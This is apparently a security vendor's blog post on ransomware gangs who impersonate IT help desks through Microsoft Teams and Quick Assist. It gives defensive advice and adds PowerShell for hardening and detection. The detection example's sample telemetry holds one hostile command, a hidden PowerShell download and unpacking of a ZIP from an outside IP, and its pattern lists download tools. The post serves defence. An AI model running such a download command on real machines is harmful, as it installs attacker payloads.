
Threat Actors Are Impersonating IT Teams to Deploy Ransomware


Threat actors historically rely on exploiting their victims’ trust for financial gain. No one is handing the keys to their house to a stranger. But if the stranger says they smell smoke and they’re dressed as a firefighter? One could be fooled.

Social engineering attempts exploit a person’s trust in brands or people they know well, either through spoofed domains or account compromise, while creating a false sense of urgency — your CEO needs you to buy those gift cards now! 

If an employee receives a large volume of spam emails at work, and the IT help desk reaches out through Microsoft Teams to resolve the issue, that’s not the same thing, is it?

The call is coming from inside the house

Coalition Incident Response (CIR) has seen a notable trend in which cyber criminals impersonate the help desk through Microsoft Teams to gain remote access to a business’ network and deploy ransomware. 

Threat actors are leveraging default settings in Microsoft 365 to their advantage, but organizations can implement several security measures to reduce their risk.

How the attacks work

In an effort to set off alarm bells for their target, a threat actor inundates the victim’s inbox with a large volume of spam email messages in a short period of time. Then, they contact the victim through Teams and impersonate an IT support provider, flagging the sudden influx of spam as the reason for the call. To “resolve the issue,” all the employee needs to do is grant remote access — often through the Microsoft Quick Assist feature.

Once a threat actor has control of the employee's device through the remote session, they run PowerShell commands and download malicious ZIP archives so that they keep access after the call ends. This persistence acts as a back door: the threat actor can return to the network later without repeating the social engineering or passing through any additional authentication.

Fortunately, CIR has not seen any of these cases escalate to full-on ransomware attacks. Endpoint monitoring effectively caught the execution of malicious files, notifying impacted organizations of the breach.

But how does a threat actor access an organization’s in-house Microsoft Teams? 

By default, Microsoft 365 permits calls and chats from external domains. A threat actor can contact employees under the guise of “IT support” through Teams unless businesses restrict access to outside organizations.

How to block IT impersonation attempts

1. Update Microsoft 365 settings

If your business uses Microsoft 365, it should restrict Teams calls and messages from outside organizations. In the Teams admin center, under Users > External access, you can block all external domains, or allow only the specific domains you need (such as an outsourced IT provider) so that every other domain is blocked.

To reduce the risk of threat actors gaining remote access, your business should also remove or block Quick Assist on managed devices. Quick Assist is a built-in Windows app rather than a Microsoft 365 setting, so it has to be uninstalled from the endpoints or blocked with application control (for example AppLocker or an Intune app-control policy); left in place, it gives threat actors a straightforward avenue for social engineering. Instead, opt for a remote access solution that provides additional layers of protection, such as requiring the helper to authenticate to your tenant.
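The two configuration changes above, as an added PowerShell example written for this edit (it is not code from the Coalition post). It assumes the MicrosoftTeams module is installed on a management workstation, that the caller is a Teams administrator, and that the endpoint part runs elevated on each Windows device (or is deployed through Intune or ConfigMgr). The partner domain `helpdesk-partner.example` is a placeholder.

```powershell
# Added example, not from the original post. Hardens the two defaults the
# post describes: Teams external access and the Quick Assist app.

# --- 1. Teams: block chats and calls from every external tenant and from
#        personal (consumer) accounts -----------------------------------
Import-Module MicrosoftTeams
Connect-MicrosoftTeams

# Record the current state so the change can be reviewed or rolled back.
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowTeamsConsumer,
                  AllowTeamsConsumerInbound, AllowPublicUsers

$federation = @{
    AllowFederatedUsers       = $false  # no chats/calls with other Microsoft 365 tenants
    AllowTeamsConsumer        = $false  # no chats/calls with personal Teams accounts
    AllowTeamsConsumerInbound = $false  # personal accounts cannot initiate contact
    AllowPublicUsers          = $false  # no Skype consumer accounts
}
Set-CsTenantFederationConfiguration @federation

# Alternative for organisations whose IT is outsourced: keep federation on
# but restrict it to an explicit allow list. Every domain not listed is
# blocked. 'helpdesk-partner.example' is a placeholder (assumption).
# $partner   = New-CsEdgeDomainPattern -Domain 'helpdesk-partner.example'
# $allowList = New-CsEdgeAllowList -AllowedDomain $partner
# Set-CsTenantFederationConfiguration -AllowFederatedUsers $true -AllowedDomains $allowList

# --- 2. Windows endpoints: remove the Quick Assist Store app ------------
$qa = 'MicrosoftCorporationII.QuickAssist'

# Remove it from every existing user profile...
Get-AppxPackage -AllUsers -Name $qa -ErrorAction SilentlyContinue |
    Remove-AppxPackage -AllUsers

# ...and from the provisioned image, so new profiles do not get it back.
Get-AppxProvisionedPackage -Online |
    Where-Object DisplayName -eq $qa |
    Remove-AppxProvisionedPackage -Online

# Older Windows 10 builds shipped Quick Assist as a Windows capability
# instead of a Store app; remove that form as well if it is present.
Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' |
    Where-Object State -eq 'Installed' |
    Remove-WindowsCapability -Online

# Verify the result on this device.
if (Get-AppxPackage -AllUsers -Name $qa -ErrorAction SilentlyContinue) {
    Write-Warning "Quick Assist is still present on $env:COMPUTERNAME"
} else {
    Write-Host "Quick Assist removed from $env:COMPUTERNAME"
}
```

Removing the package is not enough on its own if users can reinstall it from the Microsoft Store, so pair the removal with an AppLocker or Intune app-control rule that denies the Quick Assist package, and keep the "before" output of Get-CsTenantFederationConfiguration in the change record.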

2. Turn on spam filters

Don’t let threat actors create a false sense of urgency. Without an inundation of spam emails, your employees are more likely to be suspicious of unexpected outreach from the help desk. Plus, with spam filtering enabled, your organization can expect fewer phishing messages to reach inboxes in the first place.

Many email services include built-in spam filtering that scores message content for patterns common in phishing and blocks senders with a history of abusive mail. Make sure it is switched on and that its bulk-mail handling is not set permissively: the flood used in these attacks is often ordinary newsletter and sign-up mail rather than classic phishing, so bulk-mail filtering matters as much as phishing detection here.

3. Educate employees

Does your business have a standard procedure in place when it comes to interacting with IT, whether outsourced or in-house? If your employee receives an unexpected call from the help desk, they should be able to turn to a reliable place or person to confirm the information before they agree to grant remote access.

Encouraging a security-first culture emboldens your team to flag concerning or alarming situations, no matter how small. Security awareness training can be a helpful step in equipping your employees with the knowledge and skills to identify and mitigate potential threats as they come.

4. Implement managed detection and response (MDR)

Endpoint monitoring helps provide an additional layer of security in the event that an employee falls for a social engineering attempt. 

If ransomware actors have successfully accessed your network and are looking to deploy malware, 24/7/365 monitoring of your organization’s endpoints is a good way to make sure they don’t make significant headway. If your organization doesn’t have the time or resources to monitor alerts independently, MDR provides human expertise without the additional headcount.
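As an added example (written for this edit, not code from the Coalition post or from any EDR vendor), the following PowerShell function is one correlation rule an analyst could run over process-creation telemetry to catch the chain the post describes: a Quick Assist session on a host followed, within a short window, by a script host fetching or expanding a ZIP archive. The event records below are constructed for illustration; in practice they would come from Sysmon event 1, Security event 4688 or an EDR export. The field names (`Host`, `User`, `Time`, `Image`, `CommandLine`), the 15-minute window and the command-line pattern are assumptions, not a vendor schema, and the address 198.51.100.7 is a documentation range.

```powershell
# Added example, not from the original post. Flags script-host activity
# that fetches or expands a ZIP shortly after QuickAssist.exe starts on
# the same host. Field names and window length are assumptions.
function Find-QuickAssistFollowedByScript {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 15
    )

    $scriptHosts    = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe', 'wscript.exe')
    $archivePattern = '\.zip\b|Expand-Archive|Invoke-WebRequest|\biwr\b|\bcurl\b|DownloadFile'

    $alerts = @()
    foreach ($group in ($Events | Group-Object Host)) {
        $sorted   = $group.Group | Sort-Object Time
        $qaStarts = $sorted | Where-Object { $_.Image -ieq 'QuickAssist.exe' }

        foreach ($qa in $qaStarts) {
            $deadline = $qa.Time.AddMinutes($WindowMinutes)
            $suspicious = $sorted | Where-Object {
                $_.Time -ge $qa.Time -and $_.Time -le $deadline -and
                $scriptHosts -contains $_.Image.ToLower() -and
                $_.CommandLine -match $archivePattern
            }
            foreach ($s in $suspicious) {
                $alerts += [pscustomobject]@{
                    Host        = $group.Name
                    User        = $s.User
                    QuickAssist = $qa.Time
                    Script      = $s.Time
                    CommandLine = $s.CommandLine
                }
            }
        }
    }
    return $alerts
}

# Constructed sample telemetry (not real events).
$t0 = Get-Date '2025-11-10T09:00:00'
$sample = @(
    [pscustomobject]@{ Host='WS-017'; User='CONTOSO\jdoe';   Time=$t0;                Image='QuickAssist.exe'; CommandLine='QuickAssist.exe' }
    # 6 minutes into the session: hidden PowerShell pulls and unpacks a ZIP -> flagged
    [pscustomobject]@{ Host='WS-017'; User='CONTOSO\jdoe';   Time=$t0.AddMinutes(6);  Image='powershell.exe';  CommandLine='powershell -w hidden -c "iwr http://198.51.100.7/update.zip -OutFile $env:TEMP\u.zip; Expand-Archive $env:TEMP\u.zip"' }
    # Benign PowerShell in the same window: no archive/download pattern -> not flagged
    [pscustomobject]@{ Host='WS-017'; User='CONTOSO\jdoe';   Time=$t0.AddMinutes(7);  Image='powershell.exe';  CommandLine='powershell -c Get-Date' }
    # ZIP handling on a host with no Quick Assist session -> not flagged
    [pscustomobject]@{ Host='WS-042'; User='CONTOSO\asmith'; Time=$t0.AddHours(1);    Image='powershell.exe';  CommandLine='powershell -c Expand-Archive .\report.zip' }
    # Same host, but three hours later, outside the window -> not flagged
    [pscustomobject]@{ Host='WS-017'; User='CONTOSO\jdoe';   Time=$t0.AddHours(3);    Image='powershell.exe';  CommandLine='powershell -c iwr https://intranet/app.zip' }
)

Find-QuickAssistFollowedByScript -Events $sample | Format-Table -AutoSize
```

Run against the sample above, the rule returns exactly one alert (WS-017, the hidden PowerShell download six minutes into the session). The rule correlates on host and time rather than on parent process for a reason: during a Quick Assist session the helper controls the user's desktop, so the PowerShell window the attacker opens is launched from the user's own session and a parent-process rule keyed on QuickAssist.exe would not fire.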

You don't need to fight cybercrime on your own

Threat actors are constantly finding new ways to exploit your trust for their own personal gain. Don’t wait for the right phishing email to land in an employee’s inbox — get protected now.

Coalition offers tools and services to help small businesses spot, prevent, and respond to fast-moving cyber risk. To learn more about Coalition Security™, visit coalitioninc.com/security or click here to book a consultation with our team.


Coalition Security services are provided by Coalition Incident Response, Inc., a wholly owned affiliate of Coalition, Inc.
Coalition Incident Response services provided through Coalition’s wholly owned affiliate, Coalition Incident Response, Inc., are offered to policyholders as an option via our incident response firm panel. 
The claim scenarios described here are intended to show the types of situations that may result in claims. These scenarios should not be compared to any other claim. Whether or to what extent a particular loss is covered depends on the facts and circumstances of the loss, the terms and conditions of the policy as issued and applicable law.
This blog post is designed to provide general information on the topic presented and is not intended to construe or the rendering of legal or other professional services of any kind. If legal or other professional advice is required, the services of a professional should be sought. The views and opinions expressed as part of this blog post do not necessarily state or reflect those of Coalition. Neither Coalition nor any of its employees make any warranty of any kind, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, product or process disclosed. The blog post may include links to other third-party websites. These links are provided as a convenience only. Coalition does not endorse, have control over nor assumes responsibility or liability for the content, privacy policy or practices of any such third-party websites.